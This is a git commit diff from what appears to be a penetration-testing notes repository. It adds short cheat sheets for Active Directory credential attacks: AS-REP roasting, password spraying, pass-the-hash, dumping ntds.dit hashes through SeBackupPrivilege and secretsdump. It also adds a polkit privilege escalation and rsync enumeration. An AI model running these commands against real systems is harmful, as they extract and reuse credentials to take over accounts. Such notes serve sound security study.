added rsync enum alternative path

2022-01-09 22:52:39 +01:00 · 2022-01-09 22:52:39 +01:00 · 4a016c96bd
parent b45e18400a
commit 4a016c96bd
13 changed files with 109 additions and 4 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -100,3 +100,6 @@
 [submodule "reverse_engineering/java/deobfuscator"]
 	path = reverse_engineering/java/deobfuscator
 	url = https://github.com/java-deobfuscator/deobfuscator.git
+[submodule "exploit/windows/CrackMapExec"]
+	path = exploit/windows/CrackMapExec
+	url = https://github.com/byt3bl33d3r/CrackMapExec.git
--- a/enumeration/docs/kerberoast.md
+++ b/enumeration/docs/kerberoast.md
@ -0,0 +1,20 @@
+# Kerberoast
+
+## Usage
+
+* Impacket's `GetNPUsers.py` to get Hashes of userlist
+```sh
+GetNPUsers.py -no-pass <DomainName>/  -usersfile users.txt -format john -outputfile hashes
+```
+
+* Use crackmapexec to gain access to further user accounts with the password of the user found with `GetNPUsers.py`
+```sh
+crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
+```
+    * Watch out for `STATUS_PASSWORD_MUST_CHANGE`
+    * Change password with 
+```sh
+smbpasswd.py <user>@$TARGET_IP  -newpass password123
+```
+
+
--- a/enumeration/docs/rsync.md
+++ b/enumeration/docs/rsync.md
@ -1,6 +1,7 @@
 # rsync

-[netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
+* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
+* [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)

 ## Enumerate

@ -9,6 +10,19 @@ rsync <target-IP>::
 rsync <target-IP>::files
 rsync <target-IP>::files/foo/
 ```
+### via netcat
+* Another way is the following
+```sh
+nc -vn $TARGET_IP 873
+```
+* Repeat the identical handshake, e.g.
+```
+@RSYNCD: 31.0
+```
+* List all directories
+```sh
+#list
+```

 ## Downloads

--- a/exploit/linux/polkit.md
+++ b/exploit/linux/polkit.md
@ -22,3 +22,19 @@ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-re
 * `su user1` and `sudo -s`


+# Priv Esc with Two Sessions
+* User has to be member of group `sudo`
+* Open two ssh sessions
+* In session one check the PID
+```sh
+echo $$
+```
+* In the other session
+```sh
+pkttyagent --process <PID of s1>
+```
+* In session one do
+```sh
+pkexec "/bin/bash"
+``` 
+* Enter password in session two
--- a/exploit/web/ssti/tplmap
+++ b/exploit/web/ssti/tplmap
@ -1 +1 @@
-Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98
+Subproject commit 6f2150134dc637ff80478f623f28bb548ea2ca15
--- a/exploit/windows/CrackMapExec
+++ b/exploit/windows/CrackMapExec
@ -0,0 +1 @@
+Subproject commit a8df4c2a868378576f3b959261ad756e06ed3749
--- a/exploit/windows/docs/impacket.md
+++ b/exploit/windows/docs/impacket.md
@ -2,3 +2,13 @@

 * [Repo](https://github.com/SecureAuthCorp/impacket)

+## Secretsdump
+* `ntds.dit` and `system.hive` are needed
+```sh
+secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt
+````
+* Remove everything but the hashes
+* Use it to log in on the target
+```sh
+crackmapexec smb $TARGET_IP -u <user> -H hashes.txt
+```
--- a/exploit/windows/impacket
+++ b/exploit/windows/impacket
@ -1 +1 @@
-Subproject commit 6da655ca9ac4f9c2a207ea47e79d089044accd78
+Subproject commit 10e53952e64e290712d49e263420b70b681bbc73
--- a/hashes/password_cracking/hydra.md
+++ b/hashes/password_cracking/hydra.md
--- a/post_exploitation/docs/windows/pass_the_hash.md
+++ b/post_exploitation/docs/windows/pass_the_hash.md
@ -0,0 +1,12 @@
+# Pass the Hash
+
+## Usage
+
+```sh
+GetUserSPNs.py <Domain>/<user> -hashes <ntlm:hash> -outputfile hash.txt
+```
+* Crack the password
+* login
+```sh 
+evilwinrm -i $TARGET_IP -u <user> -p password
+```
--- a/post_exploitation/docs/windows/sebackupprivilege.md
+++ b/post_exploitation/docs/windows/sebackupprivilege.md
@ -0,0 +1,29 @@
+# SEBackupPrivilege Escalation
+
+* Check user privileges to escalate
+
+## Usage
+* Check `whoami /all`
+* `SeBackupPrivilege` must be present
+* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
+* Upload `diskshadow.txt` to the target with the following content
+```sh
+set metadata C:\tmp\tmp.cabs 
+set context persistent nowriters 
+add volume c: alias someAlias 
+create 
+expose %someAlias% h:
+```
+* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt`
+* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
+```sh
+import-module .\SeBackupPrivilegeUtils.dll
+import-module .\SeBackupPrivilegeCmdLets.dll
+copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
+reg save HKLM\SYSTEM C:\Path\to\uploads\system
+```
+* Downloads the files `ntds.dit` and `system`
+* Extract the hashes via
+```sh
+secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt
+```
--- a/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite
+++ b/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite
@ -1 +1 @@
-Subproject commit a17f91745cafc5fa43a428d766294190c0ff70a1
+Subproject commit 8c67152e1761fb9b403918a7fa174126f36f61db
--- a/stego/xor_key_file.py
+++ b/stego/xor_key_file.py
				`@ -0,0 +1 @@`
				`Subproject commit a8df4c2a868378576f3b959261ad756e06ed3749`